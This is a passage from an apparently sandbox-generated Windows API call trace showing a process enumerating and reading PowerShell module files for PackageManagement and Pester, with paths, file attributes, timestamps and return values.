hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0281.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0281.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0281.793] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0281.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0281.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0281.793] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.793] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0281.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0281.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0281.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0281.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0281.794] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0281.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0281.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0281.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0281.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0281.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0281.795] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0281.795] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0281.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0281.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0281.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0281.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0281.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0281.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0281.796] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0281.796] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0281.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0281.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0281.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0281.797] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.797] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.797] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0281.797] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.797] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0281.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0281.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0281.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0281.798] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0281.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0281.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0281.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0281.798] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x950 [0281.798] GetFileType (hFile=0x950) returned 0x1 [0281.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0281.799] GetFileType (hFile=0x950) returned 0x1 [0281.799] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c3ff0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c3ff0d8*, lpNumberOfBytesRead=0x653ef8c948*=0x5f8, lpOverlapped=0x0) returned 1 [0281.799] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c3fe610, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c3fe610*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.799] ReadFile (in: hFile=0x950, lpBuffer=0x25b5c3ff0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c3ff0d8*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0281.799] CloseHandle (hObject=0x950) returned 1 [0281.800] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0281.800] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0281.800] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0281.801] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0281.801] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0281.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.801] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.801] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.801] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.801] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.802] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0281.802] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.802] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.802] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.802] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0281.803] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0281.803] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0281.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0281.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0281.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.803] FindFirstFileW (in: lpFileName="C:\\Program 